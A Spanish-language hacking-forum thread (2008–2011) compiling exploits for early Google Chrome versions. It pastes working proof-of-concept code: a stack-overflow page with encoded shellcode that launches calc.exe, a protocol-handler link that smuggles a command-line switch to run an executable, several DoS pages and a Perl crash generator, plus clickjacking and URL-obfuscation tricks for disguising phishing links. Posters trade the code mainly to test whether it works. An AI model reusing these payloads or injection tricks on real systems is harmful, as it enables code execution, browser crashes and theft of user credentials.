Y otro mas que hace uso de la funcion SaveAs, vamos que tienes que guardar la pagina en tu pc, y poca gente hace eso yo creo...
http://security.bkis.vn/
--- We tested Google Chrome 0.2.149.27 on Windows XP SP2 (Open Calculator)
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 5 Septiembre 2008, 19:28 pm
Este ultimo PoC "Save As" no me funciona, y ninguna calculadora o calc.exe se ejecuto, al solo me ocasiona el DoS y/o simplemente me cierra la app, esta raro el PoC
(http://img526.imageshack.us/img526/8893/chromes0xbn6.png) (http://imageshack.us)
-berz3k.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 6 Septiembre 2008, 00:31 am
Por ahí escuché que Google Chrome no soporta RSS :(
http://foro.elhacker.net/.xml.html;sa=news;board=34;limit=10;type=rss
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 6 Septiembre 2008, 01:26 am
desbordamiento de la memoria y la ejecución arbitraria de código.. <!-- This file is saved as "Unicode" type because Chrome convert data (payload) to "Unicode" while handling. This PoC Code execute a calculator. Here comes details : We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27 and would like to inform you with this. The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users’ systems. To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system. Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2. Discoverer : Le Duc Anh - SVRT - Bkis SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems… Website : http://security.bkis.vn Mail : svrt[at]bkav.com.vn --> 瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉瓉邐ଋ)邐邐邐邐邐邐邐邐줱⑴寴玁㘭荞ﳫ씐干ⷬᮽꛐ孊Ⲕ헙㖣ƽⳌ៝ᥧ徽ᰂ쟶ꥀ⫶叼ꫝ秗娒좙ƽⳈ㣝Ⅷ핽ㆳ딷ㅧ徽ꐇ穪鸇Ꚉ湶剎浧픺㆜햛▄埝굧庆ⷬ㚽狐ꠇ箌ꚿํ媼䖳ꂮ⍦ꅡ下㉗ⶏ帶AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Click 'Save As' function for checking this vulnerability. Note: Opening multiple Calculators.
Fuentes: http://seclists.org/bugtraq/2008/Sep/0070.html http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html http://milw0rm.com/exploits/6367
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Trancek en 6 Septiembre 2008, 15:33 pm
berz3k es un stack-based buffer overflow, asi que usara algun Return Address que no este en tu sistema windows lo mas probable y por ello a lo mejor no te funcionara, digo yo..porque hay varias PoC, yo es que pase de bajarme todavia el Chrome, estoy agusto con firefox
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: sirdarckcat en 6 Septiembre 2008, 21:52 pm
javascript:Alert("test"); javascript:alert("test"); Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts: javascript:alert("test"); Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive. Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs. Falso prueba poniendo Alert(123) en firefox ;) De lo del BoF, pues que cagado jajaja.. aunque si funciona tengo screenshots :¬¬ jaja Saludos!!
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: MabUse en 6 Septiembre 2008, 21:59 pm
<script> var snoopWin;
function run() { snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/','snoopWindow','width=640,height=480'); snoopWin.blur(); setTimeout("snoopy()",1000); }
function snoopy() { alert(snoopWin.location); setTimeout("snoopy()", 100); } </script>
<a href="javascript:run();">http://www.google.com/</a> But, if: <script> var snoopWin;
function run() { snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/','snoopWindow','width=640,height=480'); snoopWin.blur(); setTimeout("snoopy()",1000); }
function snoopy() { alert(snoopWin.location); setTimeout("snoopy()", 1000); } </script>
<a href="javascript:run();">http://www.google.com/</a>
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 8 Septiembre 2008, 15:11 pm
Portal dedicado a las vulnerabilidades de Chrome: Google Chrome Silent Crash Exploit Google Chrome Inspect Element DoS Exploit Google Chrome Buffer Overflow Google Chrome Invalid URL Crash Google Chrome Omnibox Keylogger Google Chrome Comic Book Uninstalling Chrome - Is it something we said. Google Chrome Carpet Bombing Vulnerability Chrome Keyboard Shortcuts Chrome Easter Eggs Google Chrome Released
Muy gracioso los comics, ademas los Chrome Easter Eggs, como todo programa oculta los credits y demas sopresas, pero tambien informacion valiosa para algun atacante: about:internets about:version about:stats about:memory about:plugins about:histograms about:cache about:dns about:network about:crash about:hang (can crash your browser) about:% (can crash your browser)
Me resulto bastante bueno al ejecutar "about:memory" la cantidad de memoria que consume Firefox comparado con Chrome. fuente: http://chromekb.com -berz3k.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 9 Septiembre 2008, 06:47 am
Se ve bueno el sitio. http://chromekb.com/vulnerabilities/"><h1>ARREGLENMEE!</h1> fuente:http://www.jccharry.com/fake/1.txt
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 9 Septiembre 2008, 14:37 pm
Google fixea vulnerabilidades en su navegador Chrome
Google Releases New Browser Chrome - Vulnerabilities on First Day
So as most of you probably know the big buzz on the Internet last week was that Google (after supporting Firefox for so long) have actually launched their own browser.
It’s cooled Google Chrome. Now of course in typical Google fashion they call it BETA software, and a number of flaws have popped up during the first couple of days of release.
One cool thing though is that each tab runs it’s own threaded process, so if one tab bombs out it won’t take down your whole browser.
The browser is a move for Google into the online/offline integration they started with Google Desktop, there are more and more online apps (Google Office) that people still want to use offline with a Google made browser this will be possible.
You also have to consider the privacy implications though, if you are also using Gmail…Google will basically know everything you do, even worse if you also use Google Desktop they will know what you have on your computer, what e-mail you send and receive and what you surf on the web.
Curioso video donde los ciudadanos Alemanes no usaran Chrome, lo olvide postear antes:
http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome (http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome)
Abra que testear lo nuevo de Chrome.
-berz3k.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 25 Septiembre 2008, 03:15 am
Nuevo Exploit en milw0rm Versiones afectadas
Chrome/0.2.149.29 Chrome/0.2.149.30
<html> <title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title> <head> <script language="javascript">
window.open("\r\n\r\n"); window.refresh(); window.open("\r\n\r\n");
</script> </head>
<body><br><br> <h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</br></br> </center></h2>
<center> <b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br>
<hr></hr> <b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example: using alert function will make it more exhaustive.</b></br></br>
<b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></br></b> <hr></hr></center> <b>Version Tested:<br><br>Official Build 1798<br> Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13 <br><br>
Official Build 2200<br> Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13 </b> <hr></hr> </body>
</html>
-berz3k.
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 30 Septiembre 2008, 03:37 am
Versiones afectadas
Chrome/0.2.149.30 Chrome/0.2.149.29 Chrome/0.2.149.27
fuente:http://www.milw0rm.com/exploits/6609 Remote DoS Exploit <html> <head> <title>Google Chrome Window Object Suppressing Remote Denial of Service.</title> </head>
<body onLoad="window.close();"> <center> <b>Note: Design Flaw.Zero Security Check. Script Can Be Used to Kill Parent Window Directly Leading to Denial of Service.</b><br><br> </center> </body> </html>
(http://img442.imageshack.us/img442/138/30ld7.png) (http://imageshack.us) (http://img442.imageshack.us/img442/30ld7.png/1/w444.png) (http://g.imageshack.us/img442/30ld7.png/1/)
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 26 Noviembre 2008, 14:03 pm
Google Chrome MetaCharacter URI Obfuscation Vulnerability
Google chrome is vulnerable to URI Obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link can not be traversed properly in status address bar.This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. The URI specified with @ character with or without NULL character causes the vulnerability.
Vulnerable Systems: * Chrome version 0.2.149.30 * Chrome version 0.2.149.29 * Chrome version 0.2.149.27
Proof of Concept:
Link1: ftp://anoymous:guest@microsoft.com Link2: [Without NULL] | http://www.google.com@yahoo.com | [Google --> Yahoo [Obfuscation]]
Link3: http://www.secniche.org%00@www.milw0rm.com [With NULL] SecNiche --> Milw0rm [Obfuscation]
fuente: http://www.secniche.org/gcuri/index.html (http://www.secniche.org/gcuri/index.html)
-berz3k.
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 27 Diciembre 2008, 12:48 pm
Nuevo Exploit 23.12.2008Vulnerable Systems:* Chrome version 1.0.154.36 Google Chrome Browser (ChromeHTML://) Remote Parameter Injection fuente: http://www.milw0rm.com <!-- Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
No rula en: Windows Vista SP1, que alguien confirme el bug en XP SP3 con algun PoC(http://i.elhacker.net/i?i=Q90VHmFnAn4I8EG04qLjumVo) (http://i.elhacker.net/d?i=Q90VHmFnAn4I8EG04qLjumVo) (http://i.elhacker.net/i?i=b0-yGZkNI1OnkRuPIrAwyGVo) (http://i.elhacker.net/d?i=b0-yGZkNI1OnkRuPIrAwyGVo) -berz3k.
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Novlucker en 2 Enero 2009, 15:05 pm
Bueno, menos mal que berz3k ha posteado hace algunos días, así evito tener que revivir un post viejo :xD
Curiosidad: Alguien ha "jugado" con la versión final/estable de chrome y los fallos que se encuentran en este post? Es que me gustaría saber si los de google han arreglado algo o estos errores permanecen :rolleyes: , sino tocará probar por mi mismo :xD
Saludos
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 3 Enero 2009, 21:09 pm
@Novlucker
La gran mayoria estan fixeados (he jugado con todos) excepto este ultimo que he probado sobre vista, vaya; se que es un bug que afecta a XP sp3, tendre que revivir mi vieja laptop :D.
-berz3k.
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: THAL en 24 Enero 2009, 17:26 pm
Una vez abierto google chrome cuand busco cualquier tema, me sale este error: mc7cQ7Hk���S��"�:�n�.����XP
o este:
mc7cQ7Hk���S��"�3�g�'����1N
Alguna sugerencia?
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 27 Enero 2009, 22:49 pm
@THAL Que version haz instalado Linux/Win32? , seguramente no se ha instalado correctamente, postearme una screen y los pasos que ejecutas para conocer el bug.
-berz3k.
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 29 Enero 2009, 05:05 am
Nuevo Exploit 23.01.2009Vulnerable Systems:* Chrome version 1.0.154.43 Google Chrome 1.0.154.43 ClickJacking Vulnerability (2009-01-23)
fuente: http://www.milw0rm.com/exploits/7903 <html> <style type="text/css"> <!-- .style1 { font-size: 50px; font-weight: bold; } .style2 { color: #FF0000; font-weight: bold; font-size: 24px; } --> </style> <body> <span class="style2">x0x</span> <div class="style1" id="open" style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;" onmouseover="document.location='http://www.cyber-warrior.org/x0x';">This</div> <p><strong> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('open').style.left=mouseX-2; document.getElementById('open').style.top=mouseY-2; } </script> </strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p> <p><br> </p> </html>
(http://i.elhacker.net/i?i=hNJdOfgtjU7qgRcwx2wMYGVo) (http://i.elhacker.net/d?i=hNJdOfgtjU7qgRcwx2wMYGVo) MMMMM, a todos les funciona? me parece no se este ejecutando bien does any1 with more details? -berz3k.
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: TheDarkFear en 23 Marzo 2009, 20:50 pm
Google Chrome Single Thread Alert Out of Bounds Memory Access Vulnerability
Versión afectada:
Google Chrome 1.0.154.48
Exploit: http://www.securityfocus.com/data/vulnerabilities/exploits/34130-galrt.zip
No puede hacer poc ya se me habia actualizado a la versión mas reciente.
Fuente: http://www.securityfocus.com/bid/34130
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 4 Enero 2010, 08:51 am
Nuevo DoS PoC 2010-01-03 Google Chrome 4.0.249.30 DoS PoC Fuente: :http://www.exploit-db.com/exploits/10960 Exploit: #!/usr/bin/perl #google chrome 4.0.249.30 DoS PoC # # #Author: Teo Manojlovic # #Info: In ordinary cases browser would redirect to "http://www.google.com" #but in this case browser will report error for something that should #be possible and is possible on other browsers. # # # #I would like to thank Jeremy Brown who made very nice fuzzer for browser # # # # # # # #Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa $file="poc.html"; $poc='a/' x 10000000; open(myfile,">>$file"); print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>'; print myfile "<body alink="; print myfile $poc; print myfile '">'; close(myfile); print "Finished\n";
PoC DoS (http://i.elhacker.net/i?i=YRO-5w8WBYZdV3xW0xHSMGVo) (http://i.elhacker.net/d?i=YRO-5w8WBYZdV3xW0xHSMGVo) Lo he probado en la version 3.0.195.38, no he actualizado posteen link para descargar la version 4.0.249.30 y testear este PoC. -berz3k.
Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 25 Octubre 2011, 20:51 pm
Nuevo Exploit para Chrome, no lo he cofirmado, y algunos mas no los he posteado.
wCzDHqKXq6k
-berz3k.
|